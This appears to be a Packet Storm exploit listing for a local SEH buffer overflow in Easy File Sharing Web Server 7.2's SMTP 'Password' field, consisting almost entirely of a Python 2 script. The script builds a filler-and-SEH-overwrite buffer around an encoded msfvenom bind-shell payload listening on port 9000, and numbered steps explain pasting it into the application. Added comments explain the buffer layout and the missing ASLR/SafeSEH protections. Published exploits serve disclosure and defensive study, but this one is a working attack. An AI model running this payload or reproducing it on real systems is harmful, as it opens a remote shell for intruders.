Easy File Sharing Web Server 7.2 Local Buffer Overflow

2020-03-19T00:00:00
ID PACKETSTORM:156820
Type packetstorm
Reporter Felipe Winsnes
Modified 2020-03-19T00:00:00

Description

                                        
                                            `# Exploit Title: Easy File Sharing Web Server 7.2 - SMTP 'Password' Local Buffer Overflow (SEH)  
# Date: 03/16/2020  
# Author: Felipe Winsnes  
# Vendor Homepage: http://www.sharing-file.com/  
# Software Link: http://www.sharing-file.com/download.php  
# Version: 7.2  
# Tested on: Windows 7  
  
# Proof of Concept:  
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"  
# 2.- Copy the content of the new file 'poc.txt' to clipboard  
# 3.- Open fsws.exe  
# 4.- Go to 'Options'  
# 5.- Click upon 'SMTP Setup'  
# 6.- Paste clipboard on bottom-right 'Password' parameter  
# 7.- Profit  
  
# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Locally-Exploiting-SMTP-section-in-Easy-File-Sharing-Web-Server/  
  
import struct  
  
# msfvenom -p windows/shell_bind_tcp LPORT=9000 -f py -e x86/alpha_mixed EXITFUNC=thread  
# Payload size: 718 bytes  
  
# Encoded payload exactly as emitted by the msfvenom command above; it is
# only appended to the output buffer below and is never decoded or run here.
buf = b""  
buf += b"\x89\xe1\xdd\xc5\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49"  
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"  
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"  
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"  
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x49\x78\x6e"  
buf += b"\x62\x67\x70\x57\x70\x63\x30\x31\x70\x6f\x79\x78\x65"  
buf += b"\x56\x51\x6b\x70\x72\x44\x6e\x6b\x70\x50\x70\x30\x6c"  
buf += b"\x4b\x43\x62\x44\x4c\x4e\x6b\x46\x32\x54\x54\x4c\x4b"  
buf += b"\x30\x72\x55\x78\x36\x6f\x68\x37\x30\x4a\x67\x56\x36"  
buf += b"\x51\x6b\x4f\x4c\x6c\x65\x6c\x50\x61\x63\x4c\x54\x42"  
buf += b"\x74\x6c\x67\x50\x59\x51\x5a\x6f\x36\x6d\x56\x61\x68"  
buf += b"\x47\x4a\x42\x6a\x52\x70\x52\x63\x67\x6e\x6b\x73\x62"  
buf += b"\x46\x70\x4e\x6b\x63\x7a\x77\x4c\x6c\x4b\x72\x6c\x36"  
buf += b"\x71\x30\x78\x48\x63\x53\x78\x37\x71\x5a\x71\x43\x61"  
buf += b"\x4c\x4b\x72\x79\x37\x50\x66\x61\x4a\x73\x4c\x4b\x52"  
buf += b"\x69\x45\x48\x58\x63\x54\x7a\x30\x49\x6c\x4b\x64\x74"  
buf += b"\x6e\x6b\x77\x71\x78\x56\x36\x51\x49\x6f\x6c\x6c\x6f"  
buf += b"\x31\x68\x4f\x36\x6d\x73\x31\x78\x47\x45\x68\x69\x70"  
buf += b"\x42\x55\x6c\x36\x35\x53\x51\x6d\x5a\x58\x75\x6b\x63"  
buf += b"\x4d\x36\x44\x31\x65\x58\x64\x63\x68\x4e\x6b\x32\x78"  
buf += b"\x47\x54\x46\x61\x4e\x33\x70\x66\x4e\x6b\x66\x6c\x30"  
buf += b"\x4b\x6e\x6b\x51\x48\x47\x6c\x75\x51\x6e\x33\x6e\x6b"  
buf += b"\x56\x64\x4c\x4b\x47\x71\x4e\x30\x6e\x69\x63\x74\x57"  
buf += b"\x54\x57\x54\x31\x4b\x53\x6b\x61\x71\x32\x79\x33\x6a"  
buf += b"\x46\x31\x79\x6f\x4d\x30\x73\x6f\x31\x4f\x43\x6a\x6c"  
buf += b"\x4b\x37\x62\x48\x6b\x6e\x6d\x71\x4d\x51\x78\x74\x73"  
buf += b"\x76\x52\x43\x30\x37\x70\x73\x58\x54\x37\x64\x33\x30"  
buf += b"\x32\x61\x4f\x70\x54\x33\x58\x30\x4c\x61\x67\x31\x36"  
buf += b"\x66\x67\x69\x6f\x6e\x35\x78\x38\x4a\x30\x46\x61\x33"  
buf += b"\x30\x77\x70\x74\x69\x6a\x64\x31\x44\x50\x50\x72\x48"  
buf += b"\x66\x49\x6d\x50\x70\x6b\x75\x50\x4b\x4f\x6e\x35\x43"  
buf += b"\x5a\x56\x68\x61\x49\x70\x50\x48\x62\x49\x6d\x61\x50"  
buf += b"\x62\x70\x33\x70\x56\x30\x70\x68\x39\x7a\x44\x4f\x39"  
buf += b"\x4f\x79\x70\x69\x6f\x4e\x35\x5a\x37\x43\x58\x64\x42"  
buf += b"\x63\x30\x57\x53\x34\x68\x6c\x49\x5a\x46\x73\x5a\x46"  
buf += b"\x70\x32\x76\x62\x77\x35\x38\x5a\x62\x49\x4b\x74\x77"  
buf += b"\x50\x67\x4b\x4f\x48\x55\x66\x37\x31\x78\x4f\x47\x68"  
buf += b"\x69\x67\x48\x39\x6f\x49\x6f\x69\x45\x53\x67\x62\x48"  
buf += b"\x71\x64\x58\x6c\x65\x6b\x78\x61\x39\x6f\x6a\x75\x36"  
buf += b"\x37\x6d\x47\x61\x78\x70\x75\x62\x4e\x70\x4d\x45\x31"  
buf += b"\x69\x6f\x4e\x35\x71\x78\x43\x53\x70\x6d\x65\x34\x77"  
buf += b"\x70\x6c\x49\x7a\x43\x62\x77\x66\x37\x70\x57\x34\x71"  
buf += b"\x49\x66\x42\x4a\x44\x52\x53\x69\x50\x56\x58\x62\x4b"  
buf += b"\x4d\x72\x46\x39\x57\x53\x74\x75\x74\x77\x4c\x65\x51"  
buf += b"\x66\x61\x4e\x6d\x31\x54\x45\x74\x66\x70\x39\x56\x47"  
buf += b"\x70\x70\x44\x71\x44\x42\x70\x32\x76\x72\x76\x56\x36"  
buf += b"\x61\x56\x70\x56\x42\x6e\x32\x76\x73\x66\x32\x73\x73"  
buf += b"\x66\x72\x48\x63\x49\x38\x4c\x47\x4f\x6d\x56\x59\x6f"  
buf += b"\x39\x45\x4f\x79\x39\x70\x52\x6e\x71\x46\x51\x56\x49"  
buf += b"\x6f\x50\x30\x45\x38\x57\x78\x6c\x47\x47\x6d\x51\x70"  
buf += b"\x6b\x4f\x69\x45\x4f\x4b\x79\x70\x57\x6d\x66\x4a\x76"  
buf += b"\x6a\x70\x68\x4d\x76\x7a\x35\x4f\x4d\x4f\x6d\x6b\x4f"  
buf += b"\x6a\x75\x35\x6c\x64\x46\x33\x4c\x37\x7a\x6f\x70\x4b"  
buf += b"\x4b\x59\x70\x50\x75\x43\x35\x4f\x4b\x63\x77\x67\x63"  
buf += b"\x32\x52\x62\x4f\x33\x5a\x73\x30\x56\x33\x39\x6f\x7a"  
buf += b"\x75\x41\x41"  
  
# Overwritten SEH handler address, packed little-endian. The trailing
# comment records why a fixed address is usable at all: the hosting module
# is listed as having neither ASLR nor SafeSEH, so the handler is at a
# predictable location and is not on the registered-handler table. Building
# the module with those protections (or enabling SEHOP) is the mitigation
# that invalidates this technique.
seh = struct.pack("<I", 0x1002324C) # 0x1002324c : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)  
# Value written into the next-SEH field of the same record. The script does
# not document what this constant is; the linked blog post is the reference.
nseh = struct.pack("<I", 0x06710870)  
  
# Output layout: 512 bytes of filler, the SEH record (nseh, then seh),
# 20 more filler bytes, the payload, then 200 bytes of 0xff padding.
# NOTE(review): this concatenates str ("A" * 512) with bytes (struct.pack /
# b"" literals) and writes the result in text mode, which only works under
# Python 2, where both are the same type. On Python 3 this line raises
# TypeError. (`buffer` also shadows a Python 2 builtin of the same name.)
buffer = "A" * 512 + nseh + seh + "A" * 20 + buf + "\xff" * 200  
# Writes the assembled string to poc.txt in the current working directory;
# the file is then pasted by hand into the Password field (see the steps above).
f = open ("poc.txt", "w")  
f.write(buffer)  
f.close()  
`